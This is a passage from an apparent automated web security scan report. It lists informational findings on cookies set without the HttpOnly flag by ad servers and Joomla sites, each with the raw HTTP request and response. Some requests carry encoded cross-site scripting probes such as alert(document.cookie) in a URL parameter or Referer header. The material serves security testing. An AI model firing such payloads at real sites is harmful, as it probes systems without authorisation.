The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 8861b4e100db4cb878a33db82bc27555=00a1c10319baac94765f70e3f43fd867; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html HTTP/1.1
Host: comunidadjoomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 8861b4e100db4cb878a33db82bc27555=00a1c10319baac94765f70e3f43fd867; path=/
Last-Modified: Mon, 24 Jan 2011 14:55:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-es" lang="es-es" dir=
...[SNIP]...

14.242. http://cspix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
  • adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
  • clid=2lebnns011706ch47d7o8wtv181qq00f0o01050110e; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
  • rdrlst=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; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
  • sglst=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; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
  • vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.abbreviations.com%2fbs.aspx%3fst%3db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2fscript%253E7a00ceef170%26SE%3d3%26r%3d1 HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=015020a0e0f0g1lebnnsxzt1ibglxzt1wsurxzt1wsurxzt1wsur; ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=3lebnns020r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z1l024fhux122p000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru00000000004esx7120104tej; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv129yk00e0l01040210d; rdrlst=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; sglst=2100s8dtletz4d0000000a0l01040210aa70lebnns0000000e0l01040210d61gletz4d0000000a0l01040210a5b0lf17qo000000040l010402104ag2leqh190hzha00b0l01040210b82gletz4d0000000a0l01040210a9zdlebnns0ibgl00e0l01040210d82hlebnns0000000e0l01040210d5q7letz4d0000000a0l01040210aa6slebnns0ibgl00e0l01040210dachlebnns0000000e0l01040210d7x9lebnns0000000e0l01040210d820lebnns0000000e0l01040210dab4lebnns0ibgl00e0l01040210d9szlebnns0ibgl00e0l01040210d8wklebnns0ibgl00e0l01040210d923lebnns0ibgl00e0l01040210dahllebnns0000000e0l01040210d0tllegh2b0xgk100d0l01040210dal1letz4d0000000a0l01040210a8lllebnns0000000e0l01040210dabulebnns0000000e0l01040210d8bgletz4d0000000a0l01040210a7y2lebnns0000000e0l01040210d5q8lebnns0000000e0l01040210d40slebnns0000000e0l01040210d45mlfdxmc000000010l010401101a97lebnns0000000e0l01040210dah4lebnns0000000e0l01040210d3s4letz4d0000000a0l01040210a40uletz4d0000000a0l01040210aacdlebnns0000000e0l01040210daanlebnns0000000e0l01040210d9atlebnns0000000e0l01040210d86zlebnns0000000e0l01040210dac3letz4d0000000a0l010
40210a

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv181qq00f0o01050110e; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Set-Cookie: vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/
Location: http://tag.admeld.com/match?admeld_adprovider_id=304&external_user_id=6ch47d7o8wtv&_mydatasegment=foo&expiration=30days
Content-Length: 0
Date: Mon, 24 Jan 2011 21:08:43 GMT


14.243. http://d1.openx.org/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:20:40 GMT; path=/
  • OAVARS[a8c465c4]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434136%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121958%22%3B%7D; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:20:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:20:40 GMT; path=/
Set-Cookie: OAVARS[a8c465c4]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434136%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121958%22%3B%7D; path=/
Content-Length: 1480
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

14.244. http://d1.openx.org/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:20:40 GMT; path=/
  • OAVARS[a2bb8a70]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434133%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121960%22%3B%7D; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:20:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:20:40 GMT; path=/
Set-Cookie: OAVARS[a2bb8a70]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434133%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121960%22%3B%7D; path=/
Content-Length: 1482
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

14.245. http://d1.openx.org/ajs.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:05:01 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajs.php?zoneid=17099&cb=49902098508&charset=UTF-8&loc=http%3A//www.netlingo.com/ HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:05:01 GMT; path=/
Content-Length: 4795
Connection: close
Content-Type: text/javascript; charset=UTF-8

var OX_9ad7ea60 = '';
OX_9ad7ea60 += "<"+"script type=\"text/javascript\">\n";
OX_9ad7ea60 += "OXM_ad = {\"website\":\"7f43337b-cb6f-453f-9ae5-4abd7cd18bda\",\n";
OX_9ad7ea60 += "\"size\":\"468x60\",\
...[SNIP]...

14.246. http://d1.openx.org/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:05:02 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=254472&campaignid=98644&zoneid=17099&cb=a2563a7fcc&r_id=dda27c0e92ce176b4b94dc8a5861a24c&r_ts=lfk34d HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:05:02 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.247. http://delb.opt.fimserve.com/fimbid/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delb.opt.fimserve.com
Path:   /fimbid/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • UI="284ab5a022ca529df|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; Domain=.opt.fimserve.com; Expires=Fri, 22-Jan-2021 02:05:10 GMT; Path=/
  • RTB=|2937.l.931830; Domain=delb.opt.fimserve.com; Expires=Tue, 01-Feb-2011 02:05:10 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fimbid/?cachebuster=1295921111939Gck&cb=window[%22AIIcb%22]&sz=728x90&api=2&enc=1.1&est=b560d84a436c1f260f16c34efa66d8e3&l=52f2b867-a818-426d-a674-eefac27a73f6&ega=&neg=&pub=2094107610&pcat=29&ck=1&fl=1&d=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: delb.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJk0pDkd8SnPo7AmDAg==; UI=284ab5a022ca529df|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; LO=00JW6MJ6I1c0G05B0010OPU; ssrtb=0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: DMEXP=4; Domain=.opt.fimserve.com; Expires=Wed, 09-Feb-2011 02:05:10 GMT; Path=/
Set-Cookie: UI="284ab5a022ca529df|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; Domain=.opt.fimserve.com; Expires=Fri, 22-Jan-2021 02:05:10 GMT; Path=/
Set-Cookie: RTB=|2937.l.931830; Domain=delb.opt.fimserve.com; Expires=Tue, 01-Feb-2011 02:05:10 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 414
Date: Tue, 25 Jan 2011 02:05:10 GMT

window["AIIcb"]={"r":{"sb":250376,"s":"471D7F0124D207BA9A40CE442FD37ED1","ad":"http://delb.opt.fimserve.com/bidimp/?ek=AOb2kFWWo584nB3I07WnKWrRBKeP4UX2EIXzUl_oiuySRCRwepH6n3-YHiF_hVbgrMPpsVthY8EJlhEFk
...[SNIP]...

14.248. http://demo.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo.joomla.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 36d6977f587030fff3662483c73299c9=s88m18ol2u80fe0c55k3k4m1q7; expires=Sat, 05-Mar-2011 02:21:24 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: demo.joomla.org
Proxy-Connection: keep-alive
Referer: http://www.joomla.org/download.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.8.10.1295835652

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:21:23 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: 36d6977f587030fff3662483c73299c9=s88m18ol2u80fe0c55k3k4m1q7; expires=Sat, 05-Mar-2011 02:21:24 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 02:21:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en-gb"
   lang="en-gb"
...[SNIP]...

14.249. http://demo16.cloudaccess.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo16.cloudaccess.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 0d4018dcd0961c57d0d37c72abf6777f=0jc68bdosfv0usmfgmt3kojis0; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Set-Cookie: 0d4018dcd0961c57d0d37c72abf6777f=0jc68bdosfv0usmfgmt3kojis0; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...

14.250. http://demo16.cloudaccess.net/administrator/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo16.cloudaccess.net
Path:   /administrator/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 3cd367566174a1f3a2f806869f69204d=tfi2vmv2kpu2qbp7plrssh0ha6; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /administrator/index.php HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Set-Cookie: 3cd367566174a1f3a2f806869f69204d=tfi2vmv2kpu2qbp7plrssh0ha6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4671
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

14.251. http://developer.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 39f24a85b5d169a21046edfe6eaa5320=b8b89065d54bf1f5350847d3395c6862; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=b8b89065d54bf1f5350847d3395c6862; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.252. http://developer.joomla.org/security.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /security.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 39f24a85b5d169a21046edfe6eaa5320=8e5282eafc51b03f82cb3101599587e0; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security.html HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=8e5282eafc51b03f82cb3101599587e0; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.253. http://developer.joomla.org/security/news.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.joomla.org
Path:   /security/news.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 39f24a85b5d169a21046edfe6eaa5320=112a50d273cc4d78fe17a308d34dcf53; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security/news.html HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=112a50d273cc4d78fe17a308d34dcf53; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
